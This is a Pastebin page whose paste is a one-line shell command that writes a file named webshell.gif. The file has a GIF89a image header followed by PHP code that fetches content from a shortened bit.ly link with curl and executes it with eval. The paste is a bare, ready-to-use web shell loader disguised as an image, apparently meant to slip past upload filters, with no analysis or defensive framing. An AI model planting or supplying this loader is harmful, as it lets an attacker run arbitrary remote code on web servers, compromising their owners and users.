Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- printf
- “GIF89a;
- <?php
- $link = 'https://bit.ly/4dzmi5N';
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $link);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $output = curl_exec($ch);
- curl_close($ch);
- eval ('?>'.$output);
- ?>" > webshell.gif
Add Comment
Please, Sign In to add comment